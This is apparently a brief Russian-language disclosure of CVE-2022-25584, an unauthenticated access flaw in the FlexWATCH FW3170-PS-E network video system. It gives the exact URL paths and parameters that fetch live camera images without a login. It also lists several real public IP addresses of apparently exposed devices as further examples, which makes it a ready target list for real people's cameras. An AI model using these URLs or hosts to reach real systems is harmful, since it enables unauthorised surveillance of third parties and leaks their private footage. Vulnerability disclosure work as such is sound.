
Flexwatch-CVE
Flexwatch-CVE
Этот документ посвящён CVE-2022-25584 «RESERVED»
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25584

Эта уязвимость была внесена в каталог CNVD, но ещё не была обнародована
ID CNVD: CNVD-2021-103443

Воспроизведение уязвимости:
Мы обнаружили, что FlexWATCH FW3170-PS-E Network Video System 4.23-3000_GY производства Seyeon Tech Co., Ltd. содержит уязвимость неаутентифицированного доступа, которая может быть использована злоумышленниками для получения изображений с камер наблюдения и утечки конфиденциальной информации
Например:
http://211.174.227.102:10001/app/multi/single.asp

Затем мы можем посетить: http://211.174.227.102:10001/cgi-bin/fwcamimgsave.cgi?FwModId=0&PortId=0&FwCgiVer=0x0001
Скачать изображение экрана в реальном времени


Официальный сайт компании: http://www.flexwatch.com/
Другие примеры:
http://211.240.10.38:10001/app/multi/single.asp
http://121.133.21.35:10001/app/multi/single.asp
http://210.223.145.159:10001/app/multi/single.asp
http://115.142.194.178:10001/app/multi/single.asp
http://115.142.194.178:10001/app/multi/single.asp
http://27.1.124.18:10001/app/multi/single.asp
http://183.100.61.196:10001/app/multi/single.asp
http://118.176.196.247:10001/app/multi/single.asp